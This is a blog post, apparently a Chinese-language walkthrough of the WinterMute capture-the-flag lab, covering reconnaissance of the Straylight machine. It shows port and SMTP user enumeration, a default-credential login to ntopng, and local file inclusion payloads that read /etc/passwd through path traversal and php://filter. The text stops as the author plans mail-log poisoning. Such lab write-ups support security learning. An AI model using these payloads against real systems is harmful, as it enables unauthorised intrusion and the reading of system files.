{"id":439,"date":"2024-05-18T23:01:29","date_gmt":"2024-05-18T15:01:29","guid":{"rendered":"http:\/\/xiyu12.top\/?p=439"},"modified":"2024-05-18T23:01:29","modified_gmt":"2024-05-18T15:01:29","slug":"wintermute","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=439","title":{"rendered":"WinterMute"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong>Name<\/strong>: WinterMute: 1<\/li>\n\n\n\n<li><strong>Date release<\/strong>: 5 Jul 2018<\/li>\n\n\n\n<li><strong>Author<\/strong>:&nbsp;creosote<\/li>\n\n\n\n<li><strong>Series<\/strong>:&nbsp;WinterMute<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e24\u4e2a\u673a\u5668  Straylight   Neuromancer<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Straylight &#8211; simulates a public facing server with 2 NICS. Cap this first, then pivot to the final machine. Neuromancer &#8211; is within a non-public network with 1 NIC. Your Kali box should ONLY be on the same virtual network as Straylight.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Straylight  \u6a21\u62df\u4e00\u4e2a\u9762\u5411\u516c\u4f17\u7684\u670d\u52a1\u5668\uff0c\u5177\u6709\u4e24\u4e2a\u7f51\u5361\u3002Neuromancer \u5904\u4e8e\u975e\u516c\u5f00\u7f51\u7edc\u4e2d\uff0c\u53ea\u6709\u4e00\u4e2a\u7f51\u5361\u3002\u5148\u76d6\u4e0a\u8fd9\u4e2a\uff0c\u7136\u540e\u8f6c\u5230\u6700\u540e\u4e00\u53f0\u673a\u5668\u3002\u60a8\u7684Kali\u76d2\u5b50\u5e94\u8be5\u4ec5\u4e0eStraylight\u5728\u540c\u4e00\u4e2a\u865a\u62df\u7f51\u7edc\u4e2d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528 kali vm \uff08\u6865\u63a5\uff09192.168.38.107 <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Straylight vbox\uff08\u6865\u63a5\uff0c\u4ec5\u4e3b\u673a\uff09192.168.38.238<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"> Neuromancer vbox\uff08\u4ec5\u4e3b\u673a\uff09<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6\uff08Straylight\uff09<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sT --min-rate 10000 -p- 192.168.38.238        \n&#91;sudo] password for user: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-18 20:58 CST\nNmap scan report for 192.168.38.238\nHost is up (0.00055s latency).\nNot shown: 65528 closed tcp ports (conn-refused)\nPORT     STATE SERVICE\n25\/tcp   open  smtp\n80\/tcp   open  http\n3000\/tcp open  ppp\nMAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sC -sV -p 80,25,3000 192.168.38.238\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-18 21:00 CST\nNmap scan report for 192.168.38.238\nHost is up (0.00028s latency).\n\nPORT     STATE SERVICE            VERSION\n25\/tcp   open  smtp               Postfix smtpd\n|_ssl-date: TLS randomness does not represent time\n|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8\n80\/tcp   open  http               Apache httpd 2.4.25 ((Debian))\n|_http-title: Night City\n|_http-server-header: Apache\/2.4.25 (Debian)\n3000\/tcp open  hadoop-tasktracker Apache Hadoop\n| hadoop-datanode-info: \n|_  Logs: submit\n| hadoop-tasktracker-info: \n|_  Logs: submit\n|_http-trane-info: Problem with XML parsing of \/evox\/about\n| http-title: Welcome to ntopng\n|_Requested resource was \/lua\/login.lua?referer=\/\nMAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)\nService Info: Host:  straylight\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 24.12 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">smtp 25  \u90ae\u4ef6\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">apache  80 \u7f51\u9875\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">hadoop-tasktracker Apache Hadoop 3000  \u7f51\u9875<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">smtp  \u7528\u6237\u904d\u5386<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smtp-user-enum -M VRFY -U   \/usr\/share\/wordlists\/metasploit\/unix_users.txt  -t 192.168.38.238\nStarting smtp-user-enum v1.2 ( http:\/\/pentestmonkey.net\/tools\/smtp-user-enum )\n\n ----------------------------------------------------------\n|                   Scan Information                       |\n ----------------------------------------------------------\n\nMode ..................... VRFY\nWorker Processes ......... 5\nUsernames file ........... \/usr\/share\/wordlists\/metasploit\/unix_users.txt\nTarget count ............. 1\nUsername count ........... 168\nTarget TCP port .......... 25\nQuery timeout ............ 5 secs\nTarget domain ............ \n\n######## Scan started at Sat May 18 22:16:41 2024 #########\n192.168.38.238: _apt exists\n192.168.38.238: backup exists\n192.168.38.238: bin exists\n192.168.38.238: daemon exists\n192.168.38.238: games exists\n192.168.38.238: gnats exists\n192.168.38.238: irc exists\n192.168.38.238: list exists\n192.168.38.238: lp exists\n192.168.38.238: man exists\n192.168.38.238: mail exists\n192.168.38.238: messagebus exists\n192.168.38.238: mysql exists\n192.168.38.238: news exists\n192.168.38.238: nobody exists\n192.168.38.238: postfix exists\n192.168.38.238: postgres exists\n192.168.38.238: postmaster exists\n192.168.38.238: proxy exists\n192.168.38.238: root exists\n192.168.38.238: ROOT exists\n192.168.38.238: sync exists\n192.168.38.238: sys exists\n192.168.38.238: systemd-bus-proxy exists\n192.168.38.238: systemd-resolve exists\n192.168.38.238: systemd-timesync exists\n192.168.38.238: systemd-network exists\n192.168.38.238: uucp exists\n192.168.38.238: www-data exists\n######## Scan completed at Sat May 18 22:16:42 2024 #########\n29 results.\n\n168 queries in 1 seconds (168.0 queries \/ sec)\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">cat smtp | cut -d &#8216; &#8216; -f 2 &gt;&gt;smtp_user<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> gobuster dir -u http:\/\/192.168.38.238\/ --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.html,.php \n==================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) &#91;Size: 293]\n\/index.html           (Status: 200) &#91;Size: 326]\n\/.html                (Status: 403) &#91;Size: 294]\n\/manual               (Status: 301) &#91;Size: 317] &#91;--&gt; http:\/\/192.168.38.238\/manual\/]\n\/freeside             (Status: 301) &#91;Size: 319] &#91;--&gt; http:\/\/192.168.38.238\/freeside\/]\n\/.php                 (Status: 403) &#91;Size: 293]\n\/.html                (Status: 403) &#91;Size: 294]\n\/server-status        (Status: 403) &#91;Size: 302]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53d1\u73b0 http:\/\/192.168.38.238\/freeside\/<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee 3000 \u7aef\u53e3   http:\/\/192.168.38.238:3000   \u53d1\u73b0\u9ed8\u8ba4\u51ed\u8bc1  admin:admin  \u767b\u9646\u8fdb\u53bb<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-211444-1024x681.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-211444-1024x681.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-440\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><code>ntop<\/code> \u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u7f51\u7edc\u6d41\u91cf\u76d1\u89c6\u5de5\u5177\uff0c\u5b83\u63d0\u4f9b\u4e86\u4e00\u79cd\u7b80\u4fbf\u7684\u65b9\u6cd5\u6765\u67e5\u770b\u7f51\u7edc\u4f7f\u7528\u60c5\u51b5\u3002<code>ntop<\/code> \u53ef\u4ee5\u5728 web \u754c\u9762\u4e2d\u663e\u793a\u5b9e\u65f6\u548c\u5386\u53f2\u7684\u7f51\u7edc\u6d41\u91cf\u6570\u636e\uff0c\u4f7f\u7ba1\u7406\u5458\u80fd\u591f\u5206\u6790\u548c\u76d1\u63a7\u7f51\u7edc\u6d3b\u52a8<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u5230\u6709 \u51e0\u4e2a\u8def\u5f84  \/turing-bolo\/ <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/image-5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/image-5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u6b64\u56fe\u7247\u7684 alt \u5c5e\u6027\u4e3a\u7a7a\uff1b\u6587\u4ef6\u540d\u4e3a -2024-05-18-212547-1024x594.png\" class=\"wp-image-443\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee  http:\/\/192.168.38.238\/turing-bolo\/ <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-221458-1024x625.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-221458-1024x625.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-442\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e94\u8be5\u6709\u6587\u4ef6\u5305\u542b http:\/\/192.168.38.238\/turing-bolo\/bolo.php?bolo=case  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/192.168.38.238\/turing-bolo\/bolo.php?bolo=..\/..\/..\/..\/etc\/passwd <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">php:\/\/filter\/convert.base64-encode\/resource=  \u4f2a\u534f\u8bae<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/192.168.38.238\/turing-bolo\/bolo.php?bolo=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/etc\/passwd  \u5305\u542b\u4e0d\u5230\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-222229.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-222229.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-444\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-222611-1024x465.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-222611-1024x465.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-445\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u76ee\u5f55\u731c\u89e3<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6839\u636e \u4e0a\u6587\u4e2d\u7684molly.log  armitage.log  riviera.log   \u731c\u6d4b \u5e94\u8be5\u6709\u65e5\u5fd7\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u5e38\u89c1\u7684\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\n\u7cfb\u7edf\u65e5\u5fd7\u6587\u4ef6\uff1a\n\/var\/log\/syslog\uff1a\u901a\u7528\u7684\u7cfb\u7edf\u65e5\u5fd7\u6587\u4ef6\uff08\u5728 Debian \u548c Ubuntu \u7cfb\u7edf\u4e2d\u5e38\u89c1\uff09\u3002\n\/var\/log\/messages\uff1a\u901a\u7528\u7684\u7cfb\u7edf\u65e5\u5fd7\u6587\u4ef6\uff08\u5728 Red Hat \u548c CentOS \u7cfb\u7edf\u4e2d\u5e38\u89c1\uff09\u3002\n\/var\/log\/dmesg\uff1a\u5185\u6838\u548c\u542f\u52a8\u4fe1\u606f\u65e5\u5fd7\u3002\n\u5e94\u7528\u7a0b\u5e8f\u65e5\u5fd7\u6587\u4ef6\uff1a\n\/var\/log\/auth.log\uff1a\u8eab\u4efd\u9a8c\u8bc1\u76f8\u5173\u7684\u65e5\u5fd7\uff08\u5728 Debian \u548c Ubuntu \u7cfb\u7edf\u4e2d\u5e38\u89c1\uff09\u3002\n\/var\/log\/secure\uff1a\u8eab\u4efd\u9a8c\u8bc1\u76f8\u5173\u7684\u65e5\u5fd7\uff08\u5728 Red Hat \u548c CentOS \u7cfb\u7edf\u4e2d\u5e38\u89c1\uff09\u3002\n\/var\/log\/apache2\/\uff1aApache HTTP \u670d\u52a1\u5668\u7684\u65e5\u5fd7\u76ee\u5f55\uff08\u5728 Debian \u548c Ubuntu \u7cfb\u7edf\u4e2d\uff09\u3002\n\/var\/log\/apache2\/access.log\uff1aApache \u8bbf\u95ee\u65e5\u5fd7\u3002\n\/var\/log\/apache2\/error.log\uff1aApache \u9519\u8bef\u65e5\u5fd7\u3002\n\/var\/log\/httpd\/\uff1aApache HTTP \u670d\u52a1\u5668\u7684\u65e5\u5fd7\u76ee\u5f55\uff08\u5728 Red Hat \u548c CentOS \u7cfb\u7edf\u4e2d\uff09\u3002\n\/var\/log\/nginx\/\uff1aNginx \u670d\u52a1\u5668\u7684\u65e5\u5fd7\u76ee\u5f55\u3002\n\/var\/log\/nginx\/access.log\uff1aNginx \u8bbf\u95ee\u65e5\u5fd7\u3002\n\/var\/log\/nginx\/error.log\uff1aNginx \u9519\u8bef\u65e5\u5fd7\u3002\n\/var\/log\/mysql\/\uff1aMySQL \u6570\u636e\u5e93\u7684\u65e5\u5fd7\u76ee\u5f55\u3002\n\/var\/log\/mysql\/error.log\uff1aMySQL \u9519\u8bef\u65e5\u5fd7\u3002\n\u7528\u6237\u5b9a\u4e49\u7684\u5e94\u7528\u7a0b\u5e8f\u65e5\u5fd7\uff1a\n\/var\/log\/\uff1a\u8bb8\u591a\u7528\u6237\u548c\u5e94\u7528\u7a0b\u5e8f\u5c06\u65e5\u5fd7\u6587\u4ef6\u5b58\u50a8\u5728\u6b64\u76ee\u5f55\u4e2d\u3002\n\/home\/&lt;username&gt;\/logs\/\uff1a\u7528\u6237\u76ee\u5f55\u4e2d\u7684\u65e5\u5fd7\u6587\u4ef6\uff08\u6839\u636e\u5e94\u7528\u7a0b\u5e8f\u7684\u914d\u7f6e\uff09\u3002\n\u67e5\u627e\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\u7684\u65b9\u6cd5\n1. \u67e5\u770b\u5e94\u7528\u7a0b\u5e8f\u914d\u7f6e\u6587\u4ef6\n\u5927\u591a\u6570\u5e94\u7528\u7a0b\u5e8f\u90fd\u6709\u914d\u7f6e\u6587\u4ef6\uff0c\u5176\u4e2d\u6307\u5b9a\u4e86\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\u3002\u5e38\u89c1\u7684\u914d\u7f6e\u6587\u4ef6\u8def\u5f84\u5305\u62ec\uff1a\nApache \u914d\u7f6e\u6587\u4ef6\uff08\u5982 \/etc\/apache2\/apache2.conf \u6216 \/etc\/httpd\/conf\/httpd.conf\uff09\u3002\nNginx \u914d\u7f6e\u6587\u4ef6\uff08\u5982 \/etc\/nginx\/nginx.conf\uff09\u3002\nMySQL \u914d\u7f6e\u6587\u4ef6\uff08\u5982 \/etc\/mysql\/my.cnf \u6216 \/etc\/my.cnf\uff09\u3002\n\u4f8b\u5982\uff0c\u68c0\u67e5 Apache \u7684\u914d\u7f6e\u6587\u4ef6\u6765\u67e5\u627e\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff1a\n\u793a\u4f8b\uff1a\u67e5\u770b ntop \u6216 ntopng \u7684\u65e5\u5fd7\n\u5047\u8bbe\u4f60\u5728\u5bfb\u627e ntop \u6216 ntopng \u7684\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff0c\u53ef\u4ee5\u67e5\u770b\u5176\u914d\u7f6e\u6587\u4ef6\uff08\u4f8b\u5982 \/etc\/ntopng\/ntopng.conf\uff09\u6216\u8005\u5e38\u89c1\u7684\u65e5\u5fd7\u8def\u5f84\uff08\u5982 \/var\/log\/ntopng\/\uff09\uff1a\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u4e00\u4e2a\u7f51\u9875 \u53ef\u4ee5\u731c\u6d4b\u662f  apache \u7684\u65e5\u5fd7  \/var\/log\/apache2\/molly.log \u4e0d\u662f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6216\u8005  \u662fntop \u7684\u65e5\u5fd7   \/etc\/ntopng\/ntopng.conf   \/etc\/ntopng\/molly.log  \u4e0d\u662f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u60f3\u4e0d\u5230  \u6839\u672c\u60f3\u4e0d\u5230     \u662f \u90ae\u4ef6\u670d\u52a1\u7684\u65e5\u5fd7   smtp  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\/var\/log\/mail.log   \/log\/mail.log  \/log\/mail \u6ca1\u6709\u540e\u7f00   \u96be\u641e\u554a  \u8fd8\u662f\u4ee5\/log  \u5f00\u5934\u7684  \u6211\u662f\u6839\u672c\u60f3\u4e0d\u5230<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Postfix\nPostfix \u662f\u5e38\u7528\u7684 SMTP \u670d\u52a1\u5668\uff0c\u65e5\u5fd7\u901a\u5e38\u8bb0\u5f55\u5728 \/var\/log \u76ee\u5f55\u4e2d\u3002\n\u4e3b\u65e5\u5fd7\u6587\u4ef6\uff1a\n\/var\/log\/mail.log\uff08\u5728 Debian\/Ubuntu \u7cfb\u7edf\u4e2d\uff09\n\/var\/log\/maillog\uff08\u5728 CentOS\/Red Hat \u7cfb\u7edf\u4e2d\uff09\n\u67e5\u770b Postfix \u65e5\u5fd7\u6587\u4ef6\u793a\u4f8b\uff1a\ntail -f \/var\/log\/mail.log\n\u6216\u8005\u5728 CentOS\/Red Hat \u7cfb\u7edf\u4e2d\uff1a\ntail -f \/var\/log\/maillog\n2. Sendmail\nSendmail \u662f\u53e6\u4e00\u4e2a\u5e38\u89c1\u7684 SMTP \u670d\u52a1\u5668\u3002\n\u4e3b\u65e5\u5fd7\u6587\u4ef6\uff1a\n\/var\/log\/mail.log\uff08\u5728 Debian\/Ubuntu \u7cfb\u7edf\u4e2d\uff09\n\/var\/log\/maillog\uff08\u5728 CentOS\/Red Hat \u7cfb\u7edf\u4e2d\uff09\n\u67e5\u770b Sendmail \u65e5\u5fd7\u6587\u4ef6\u793a\u4f8b\uff1a\ntail -f \/var\/log\/mail.log\n\u6216\u8005\u5728 CentOS\/Red Hat \u7cfb\u7edf\u4e2d\uff1a\ntail -f \/var\/log\/maillog\n3. Exim\nExim \u662f\u4e00\u4e2a\u9ad8\u5ea6\u53ef\u914d\u7f6e\u7684 SMTP \u90ae\u4ef6\u4f20\u8f93\u4ee3\u7406\u3002\n\u4e3b\u65e5\u5fd7\u6587\u4ef6\uff1a\n\/var\/log\/exim4\/mainlog\uff08\u5728 Debian\/Ubuntu \u7cfb\u7edf\u4e2d\uff09\n\/var\/log\/exim\/mainlog\uff08\u5728 CentOS\/Red Hat \u7cfb\u7edf\u4e2d\uff09\n\u67e5\u770b Exim \u65e5\u5fd7\u6587\u4ef6\u793a\u4f8b\uff1a\ntail -f \/var\/log\/exim4\/mainlog\n\u6216\u8005\u5728 CentOS\/Red Hat \u7cfb\u7edf\u4e2d\uff1a\ntail -f \/var\/log\/exim\/mainlog\n4. Qmail\nQmail \u662f\u4e00\u4e2a\u7b80\u5355\u7684 SMTP \u90ae\u4ef6\u4f20\u8f93\u4ee3\u7406\u3002\n\u4e3b\u65e5\u5fd7\u6587\u4ef6\uff1a\n\/var\/log\/qmail \u76ee\u5f55\u4e0b\u7684\u65e5\u5fd7\u6587\u4ef6\n\u67e5\u770b Qmail \u65e5\u5fd7\u6587\u4ef6\u793a\u4f8b\uff1a\ntail -f \/var\/log\/qmail\/current\n\u67e5\u627e\u65e5\u5fd7\u6587\u4ef6\u7684\u65b9\u6cd5\n\u5982\u679c\u4f60\u4e0d\u786e\u5b9a\u4f7f\u7528\u7684\u662f\u54ea\u79cd SMTP \u670d\u52a1\u5668\uff0c\u53ef\u4ee5\u901a\u8fc7\u4ee5\u4e0b\u6b65\u9aa4\u6765\u67e5\u627e\u76f8\u5173\u7684\u65e5\u5fd7\u6587\u4ef6\uff1a\n1. \u67e5\u627e\u90ae\u4ef6\u670d\u52a1\n\u68c0\u67e5\u5f53\u524d\u6b63\u5728\u8fd0\u884c\u7684\u90ae\u4ef6\u670d\u52a1\uff1a\nps aux | grep -E 'postfix|sendmail|exim|qmail'\n\u8fd9\u5c06\u663e\u793a\u6b63\u5728\u8fd0\u884c\u7684\u90ae\u4ef6\u670d\u52a1\u5668\u3002\n2. \u67e5\u627e\u65e5\u5fd7\u8def\u5f84\n\u4f7f\u7528 grep \u547d\u4ee4\u5728 \/etc \u76ee\u5f55\u4e2d\u67e5\u627e\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u65e5\u5fd7\u8def\u5f84\u914d\u7f6e\uff1a\ngrep -i 'log' \/etc\/postfix\/main.cf  # Postfix\ngrep -i 'log' \/etc\/sendmail\/sendmail.cf  # Sendmail\ngrep -i 'log' \/etc\/exim4\/exim4.conf  # Exim\ngrep -i 'log' \/var\/qmail\/control\/  # Qmail\n3. \u67e5\u770b\u7cfb\u7edf\u65e5\u5fd7\n\u6709\u65f6\u90ae\u4ef6\u670d\u52a1\u5668\u7684\u65e5\u5fd7\u4e5f\u4f1a\u5305\u542b\u5728\u7cfb\u7edf\u65e5\u5fd7\u4e2d\uff0c\u53ef\u4ee5\u901a\u8fc7 journalctl \u67e5\u770b\uff1a\njournalctl -u postfix\njournalctl -u sendmail\njournalctl -u exim4\njournalctl -u qmail\n\u901a\u8fc7\u8fd9\u4e9b\u65b9\u6cd5\uff0c\u4f60\u53ef\u4ee5\u627e\u5230 SMTP \u670d\u52a1\u5668\u7684\u65e5\u5fd7\u6587\u4ef6\uff0c\u5e76\u67e5\u770b\u76f8\u5173\u7684\u65e5\u5fd7\u4fe1\u606f\u3002\u8fd9\u6837\u53ef\u4ee5\u5e2e\u52a9\u4f60\u8c03\u8bd5\u548c\u76d1\u63a7\u90ae\u4ef6\u4f20\u8f93\u7684\u60c5\u51b5\u3002<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-224532-1024x528.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-224532-1024x528.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-446\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9\uff08Straylight\uff09<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u6211\u83b7\u5f97\u8fd9\u4e2a\u6587\u4ef6\u5305\u542b \u65f6  \u8054\u7cfb\u5230 \u8fd9\u662f\u4e2a\u90ae\u4ef6\u65e5\u5fd7   \u7136\u540e\u8fd8\u6709\u4e00\u4e2asmtp \u7684\u670d\u52a1 <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u53ef\u4ee5 \u5199\u5165\u4e00\u4e9b\u4e1c\u897f \u4f7f\u65e5\u5fd7\u88ab\u5305\u542b \u53d8\u6210\u53ef\u6267\u884c\u7684\u6587\u4ef6<\/p>\n\n\n\n<p 